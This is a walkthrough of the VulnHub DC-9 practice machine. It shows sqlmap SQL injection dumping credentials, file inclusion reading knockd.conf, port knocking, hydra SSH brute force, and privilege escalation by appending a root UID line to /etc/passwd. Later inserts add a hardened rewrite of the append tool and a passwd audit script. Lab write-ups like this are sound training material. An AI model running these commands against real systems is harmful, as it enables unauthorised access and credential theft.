vulnhub-DC-9

Information gathering

Run an nmap scan first.

└─# nmap -A -p1-65535 192.168.20.139   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 19:54 CST
Nmap scan report for 192.168.20.139
Host is up (0.0015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Example.com - Staff Details - Welcome
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:8D:A7:50 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 1.46 ms 192.168.20.139

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.59 seconds

This time port 80 is open but port 22 is not; something may be going on there, so look at port 80 first.

SQL injection

The search page has a very ordinary SQL injection, so just run sqlmap on it.

└─# sqlmap -r "ma.txt" --dbs --batch
available databases [3]:
[*] information_schema
[*] Staff
[*] users

Look at the Staff database first; the administrator password can be obtained from it.

sqlmap -r "ma.txt" -D Staff -T Users -C Username,Password --dump --batch
+----------+----------------------------------+
| Username | Password |
+----------+----------------------------------+
| admin | 856f5de590ef37314e7c3bdf6f8a66dc |
+----------+----------------------------------+

It is obviously MD5, and it decrypts to transorbital1; logging into the backend succeeds. At the foot of the Manage page there is a "File does not exist" message, which clearly points to a file inclusion; guessing that the parameter is named file works. Since port 22 is closed, the guess is that a knock service is enabled, so check whether it is there.

/addrecord.php?file=../../../../etc/knockd.conf

[options]
    UseSyslog

[openSSH]
    sequence    = 7469,8475,9842
    seq_timeout = 25
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9842,8475,7469
    seq_timeout = 25
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

It is indeed there; knock with the secret sequence (7469,8475,9842).

└─# nc -z 192.168.20.139 7469 8475 9842

└─# nmap -A -p1-65535 192.168.20.139
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 19:55 CST
Nmap scan report for 192.168.20.139
Host is up (0.0016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
| 256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
|_ 256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Example.com - Staff Details - Welcome
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:8D:A7:50 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 1.64 ms 192.168.20.139

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.69 seconds

OK, it is open. What about a username and password? Remember that the database also had a users database; dump it.

sqlmap -r "ma.txt" -D users -T UserDetails -C username,password --dump --batch

+-----------+---------------+
| username | password |
+-----------+---------------+
| marym | 3kfs86sfd |
| julied | 468sfdfsd2 |
| fredf | 4sfd87sfd1 |
| barneyr | RocksOff |
| tomc | TC&TheBoyz |
| jerrym | B8m#48sd |
| wilmaf | Pebbles |
| bettyr | BamBam01 |
| chandlerb | UrAG0D! |
| joeyt | Passw0rd |
| rachelg | yN72#dsd |
| rossg | ILoveRachel |
| monicag | 3248dsds7s |
| phoebeb | smellycats |
| scoots | YR3BVxxxw87 |
| janitor | Ilovepeepee |
| janitor2 | Hawaii-Five-0 |
+-----------+---------------+

Brute-force it with hydra.

└─# hydra -L users.txt -P pass.txt 192.168.20.139 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-26 20:12:47
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://192.168.20.139:22/
[22][ssh] host: 192.168.20.139 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.20.139 login: joeyt password: Passw0rd
[STATUS] 247.00 tries/min, 247 tries in 00:01h, 45 to do in 00:01h, 13 active
[22][ssh] host: 192.168.20.139 login: janitor password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-26 20:14:02

That gives three users. I checked all of them; only the janitor user has a suspicious file.

└─# ssh janitor@192.168.20.139
janitor@192.168.20.139's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
janitor@dc-9:~$ ls
janitor@dc-9:~$ cd /home/janitor
janitor@dc-9:~$ ls
janitor@dc-9:~$ ls -a
. .. .bash_history .gnupg .secrets-for-putin
janitor@dc-9:~$ car .secrets-for-putin/
-bash: car: command not found
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

More passwords. Add them to the wordlist and brute-force again, which yields one more user.

[22][ssh] host: 192.168.20.139   login: fredf   password: B4-Tru3-001

Privilege escalation via sudo

The usual checks: sudo and SUID.

fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/test

Looking at the file shows it is a compiled binary; after digging around, it turns out to have been generated from test.py.

fredf@dc-9:/opt/devstuff$ cat test.py
#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()

It simply appends the contents of file 1 to file 2, and because it runs as root under sudo without a password, it can be used to add a root-privileged user to /etc/passwd.
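For comparison, here is a hardened rewrite of the same append tool, added as an illustration and not the file from the DC-9 box. Whether such a tool should be granted sudo at all is the real question, but if it must run privileged it should refuse symlinks, non-regular files and any destination outside an allow-listed directory; ALLOWED_DEST_DIR is an assumed value.

```python
import os
import sys

# Assumption (not from the page): appends are confined to this directory.
ALLOWED_DEST_DIR = "/var/lib/devstuff/out"


def check_path(path, allowed_dir=None):
    """Return the resolved path if it is not a symlink and (when allowed_dir
    is given) lies under allowed_dir; raise ValueError otherwise."""
    if os.path.islink(path):
        raise ValueError("symlink refused: %s" % path)
    real = os.path.realpath(path)
    if os.path.exists(real) and not os.path.isfile(real):
        raise ValueError("not a regular file: %s" % path)
    if allowed_dir is not None:
        base = os.path.realpath(allowed_dir)
        if os.path.commonpath([base, real]) != base:
            raise ValueError("destination outside %s refused: %s" % (base, path))
    return real


def append_file(src, dst, allowed_dir=ALLOWED_DEST_DIR):
    """Append src to dst after validating both paths; return bytes appended."""
    src_real = check_path(src)
    dst_real = check_path(dst, allowed_dir)
    with open(src_real, "rb") as f:
        data = f.read()
    # O_NOFOLLOW: a symlink swapped in between the check and the open is refused too.
    flags = os.O_WRONLY | os.O_APPEND | os.O_CREAT | os.O_NOFOLLOW
    fd = os.open(dst_real, flags, 0o640)
    with os.fdopen(fd, "ab") as out:
        out.write(data)
    return len(data)


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: test.py <read> <append>")
        sys.exit(1)
    try:
        print("appended %d bytes" % append_file(sys.argv[1], sys.argv[2]))
    except (ValueError, OSError) as e:
        print("refused: %s" % e)
        sys.exit(2)
```

With this version the walkthrough's call with /etc/passwd as the destination is rejected before anything is read or written.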

fredf@dc-9:/opt/devstuff$ openssl passwd -1 -salt hsh hsh
$1$hsh$TvjPz1RW6vswLzyLFta1c1
fredf@dc-9:/tmp$ echo 'hsh:$1$hsh$TvjPz1RW6vswLzyLFta1c1:0:0::/root:/bin/bash'>hshdgyq
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test hshdgyq /etc/passwd
Traceback (most recent call last):
File "test.py", line 10, in <module>
FileNotFoundError: [Errno 2] No such file or directory: 'hshdgyq'
[2699] Failed to execute script test
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/hshdgyq /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
marym:x:1001:1001:Mary Moe:/home/marym:/bin/bash
julied:x:1002:1002:Julie Dooley:/home/julied:/bin/bash
fredf:x:1003:1003:Fred Flintstone:/home/fredf:/bin/bash
barneyr:x:1004:1004:Barney Rubble:/home/barneyr:/bin/bash
tomc:x:1005:1005:Tom Cat:/home/tomc:/bin/bash
jerrym:x:1006:1006:Jerry Mouse:/home/jerrym:/bin/bash
wilmaf:x:1007:1007:Wilma Flintstone:/home/wilmaf:/bin/bash
bettyr:x:1008:1008:Betty Rubble:/home/bettyr:/bin/bash
chandlerb:x:1009:1009:Chandler Bing:/home/chandlerb:/bin/bash
joeyt:x:1010:1010:Joey Tribbiani:/home/joeyt:/bin/bash
rachelg:x:1011:1011:Rachel Green:/home/rachelg:/bin/bash
rossg:x:1012:1012:Ross Geller:/home/rossg:/bin/bash
monicag:x:1013:1013:Monica Geller:/home/monicag:/bin/bash
phoebeb:x:1014:1014:Phoebe Buffay:/home/phoebeb:/bin/bash
scoots:x:1015:1015:Scooter McScoots:/home/scoots:/bin/bash
janitor:x:1016:1016:Donald Trump:/home/janitor:/bin/bash
janitor2:x:1017:1017:Scott Morrison:/home/janitor2:/bin/bash
hsh:$1$hsh$TvjPz1RW6vswLzyLFta1c1:0:0::/root:/bin/bash

Switching to the new user now gives root.

fredf@dc-9:/opt/devstuff/dist/test$ su hsh
Password:
root@dc-9:/opt/devstuff/dist/test# whoami
root

With that the box is cracked, and the VulnHub DC series ends here.

Summary

The earlier steps were routine; it was only at the file-write step that I was not very familiar with the format of the passwd file, so I looked into it in detail:

hsh:$1$hsh$TvjPz1RW6vswLzyLFta1c1:0:0::/root:/bin/bash

Username (hsh)
The account's login name.

Password field ($1$hsh$TvjPz1RW6vswLzyLFta1c1)
On modern systems this field holds the password's hash.
$1$ indicates that MD5 (md5-crypt) is the hashing algorithm.
The remainder is the hashed password value itself.

User ID (0)
0 is the user ID of the system administrator (root), who has the highest privileges on the system.
Group ID (0)
0 means the user belongs to the root group.

User description field (empty)
Usually used to store the user's full name or other information; empty here.

Home directory (/root)
The user's home directory; /root is the administrator's default home directory.

Default shell (/bin/bash)
The command interpreter (shell) started when the user logs in, here Bash.
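Added here as an example (not part of the original post): a small parser for the passwd format described above, plus an audit that flags exactly the traits of the appended hsh line that a defender would want to catch. Normally the password field holds only the placeholder x and the real hash sits in /etc/shadow, so a hash stored directly in /etc/passwd, a second UID 0 account, or a duplicate UID are each worth an alert; the sample records are constructed, apart from the lines taken from the dump above.

```python
PASSWD_FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")
# Values meaning "the hash lives in /etc/shadow" or "account locked".
PLACEHOLDERS = {"x", "*", "!", "!!"}
HASH_PREFIXES = {"$1$": "md5-crypt", "$5$": "sha256-crypt",
                 "$6$": "sha512-crypt", "$y$": "yescrypt", "$2b$": "bcrypt"}

# Constructed sample: three ordinary records plus the line appended in the walkthrough.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1003:1003:Fred Flintstone:/home/fredf:/bin/bash
hsh:$1$hsh$TvjPz1RW6vswLzyLFta1c1:0:0::/root:/bin/bash
"""

def parse_passwd_line(line):
    """Split one passwd record into a dict; raise ValueError if malformed."""
    parts = line.rstrip("\n").split(":")
    if len(parts) != 7:
        raise ValueError("expected 7 fields, got %d" % len(parts))
    rec = dict(zip(PASSWD_FIELDS, parts))
    rec["uid"], rec["gid"] = int(rec["uid"]), int(rec["gid"])
    return rec

def hash_algorithm(field):
    """Describe a non-placeholder password field from its $id$ prefix."""
    if field == "":
        return "empty"
    for prefix, name in HASH_PREFIXES.items():
        if field.startswith(prefix):
            return name
    return "unknown scheme"

def audit_passwd(text):
    """Return (username, finding) pairs for records a defender should review."""
    findings, seen_uids = [], {}
    for lineno, line in enumerate(text.splitlines(), 1):
        try:
            rec = parse_passwd_line(line)
        except ValueError as e:
            findings.append(("<line %d>" % lineno, "malformed: %s" % e))
            continue
        name, uid, pw = rec["name"], rec["uid"], rec["passwd"]
        if uid == 0 and name != "root":
            findings.append((name, "extra UID 0 account"))
        if pw not in PLACEHOLDERS:
            findings.append((name, "password field is not a placeholder: %s" % hash_algorithm(pw)))
        if uid in seen_uids:
            findings.append((name, "duplicate UID %d (also %s)" % (uid, seen_uids[uid])))
        seen_uids.setdefault(uid, name)
    return findings
```

Running audit_passwd over the real file (open("/etc/passwd").read()) on a host reports three findings for hsh and nothing for the stock accounts.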